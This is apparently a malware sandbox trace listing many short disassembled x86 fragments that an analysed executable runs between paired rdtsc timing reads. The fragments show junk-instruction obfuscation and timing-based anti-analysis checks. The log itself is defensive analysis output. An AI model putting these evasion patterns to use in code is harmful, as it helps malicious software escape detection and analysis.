Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 810B47 second address: 810B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 810C0D second address: 810C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 810C11 second address: 810C32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D129h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 810C32 second address: 810C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 811397 second address: 8113A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCBACB2D116h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 813A99 second address: 813A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 813A9D second address: 813ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FCBACB2D124h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 813ABD second address: 813AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 814A29 second address: 814A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D127h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 818ED5 second address: 818EDA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 816A4D second address: 816A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 818EDA second address: 818EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 ja 00007FCBAD522AB2h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 816A56 second address: 816A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 816A5A second address: 816A5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 818EF9 second address: 818F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D125h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+1247EE46h], ecx 0x00000011 push 00000000h 0x00000013 mov edi, 14305337h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007FCBACB2D118h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 xor edi, dword ptr [ebp+122D1B18h] 0x0000003a xchg eax, esi 0x0000003b jmp 00007FCBACB2D11Bh 0x00000040 push eax 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 818F56 second address: 818F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8190C0 second address: 8190C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8190C5 second address: 8190CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81A092 second address: 81A098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81A098 second address: 81A0C0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCBAD522AB9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81BE68 second address: 81BE6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81BE6C second address: 81BF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FCBAD522AA8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b xor dword ptr [ebp+122D218Eh], edi 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 xor dword ptr [ebp+122D178Ch], esi 0x0000003e mov eax, dword ptr [ebp+122D1449h] 0x00000044 or di, 9EB6h 0x00000049 push FFFFFFFFh 0x0000004b jmp 00007FCBAD522AB6h 0x00000050 nop 0x00000051 pushad 0x00000052 jmp 00007FCBAD522AB4h 0x00000057 jne 00007FCBAD522AA8h 0x0000005d popad 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push edi 0x00000062 jno 00007FCBAD522AA6h 0x00000068 pop edi 0x00000069 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81BF01 second address: 81BF1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D128h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81EBEC second address: 81EBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81EBF2 second address: 81EBF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81EBF7 second address: 81EC14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBAD522AB9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81FBE7 second address: 81FBEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81FBEB second address: 81FBF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 820BC9 second address: 820C47 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBACB2D118h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push eax 0x00000010 sub ebx, 4BCAF1B2h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FCBACB2D118h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D2905h], ebx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007FCBACB2D118h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 jl 00007FCBACB2D11Ch 0x0000005b xor ebx, 74DCD108h 0x00000061 mov edi, dword ptr [ebp+1245338Dh] 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c jp 00007FCBACB2D116h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 820C47 second address: 820C51 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 823328 second address: 8233AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBACB2D128h 0x00000009 popad 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FCBACB2D118h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007FCBACB2D118h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 push 00000000h 0x00000044 mov ebx, dword ptr [ebp+1247EDF2h] 0x0000004a xchg eax, esi 0x0000004b pushad 0x0000004c jmp 00007FCBACB2D11Dh 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8233AB second address: 8233B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81CF02 second address: 81CF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8241AB second address: 8241B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBAD522AA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8241B6 second address: 8241C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FCBACB2D116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81CF06 second address: 81CF0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8253E3 second address: 82540A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jp 00007FCBACB2D116h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FCBACB2D122h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 828499 second address: 8284AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBAD522AADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 82C32B second address: 82C33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 je 00007FCBACB2D11Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 82BC2A second address: 82BC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 82BC2E second address: 82BC38 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCBACB2D116h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 82BD9F second address: 82BDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7CBC57 second address: 7CBC7D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCBACB2D116h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FCBACB2D123h 0x00000014 pop esi 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7CBC7D second address: 7CBC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB2h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7CBC97 second address: 7CBC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 835A4B second address: 835A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 835FB5 second address: 835FD5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBACB2D127h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 836996 second address: 83699A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83699A second address: 8369B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FCBACB2D128h 0x0000000c je 00007FCBACB2D116h 0x00000012 jmp 00007FCBACB2D11Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83AF7D second address: 83AFA5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCBAD522AB6h 0x00000008 jmp 00007FCBAD522AAAh 0x0000000d jnp 00007FCBAD522AA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FCBAD522AACh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83B0F7 second address: 83B0FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83B3D4 second address: 83B3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83B3DA second address: 83B3DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83B649 second address: 83B64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83BB9E second address: 83BBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83BBA5 second address: 83BBB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCBAD522AABh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 840891 second address: 8408BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FCBACB2D128h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8408BD second address: 8408E4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ecx 0x00000008 jno 00007FCBAD522ABCh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83F60E second address: 83F614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83F614 second address: 83F618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 807958 second address: 8079A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FCBACB2D121h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 jbe 00007FCBACB2D118h 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c jg 00007FCBACB2D12Dh 0x00000022 jo 00007FCBACB2D11Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8079A5 second address: 807A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jmp 00007FCBAD522AB5h 0x0000000e pop eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FCBAD522AA8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov edx, dword ptr [ebp+122D391Ch] 0x0000002f call 00007FCBAD522AA9h 0x00000034 pushad 0x00000035 jmp 00007FCBAD522AB8h 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 807A11 second address: 807A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 807A28 second address: 807A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 807A2C second address: 807A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D122h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jg 00007FCBACB2D116h 0x00000010 pop edx 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jc 00007FCBACB2D123h 0x0000001c jmp 00007FCBACB2D11Dh 0x00000021 mov eax, dword ptr [eax] 0x00000023 pushad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 807A68 second address: 807A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCBAD522AA6h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 807BAF second address: 807BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D129h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80829E second address: 8082A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8085E3 second address: 8085E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8085E7 second address: 808621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FCBAD522AB8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCBAD522AB6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8086D9 second address: 8086E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FCBACB2D11Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83F940 second address: 83F944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83FF46 second address: 83FF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83FF4C second address: 83FF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FCBAD522ABBh 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jg 00007FCBAD522AA6h 0x00000016 jno 00007FCBAD522AA6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FCBAD522AAFh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83FF91 second address: 83FF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8400FA second address: 840109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FCBAD522AA6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 840277 second address: 84027D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 84027D second address: 8402BC instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBAD522AB7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ecx 0x0000000f jmp 00007FCBAD522AB5h 0x00000014 jl 00007FCBAD522AAEh 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 845E6C second address: 845E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 844A97 second address: 844AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB5h 0x00000009 js 00007FCBAD522AA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 844DB8 second address: 844DC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FCBACB2D116h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 844DC4 second address: 844DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
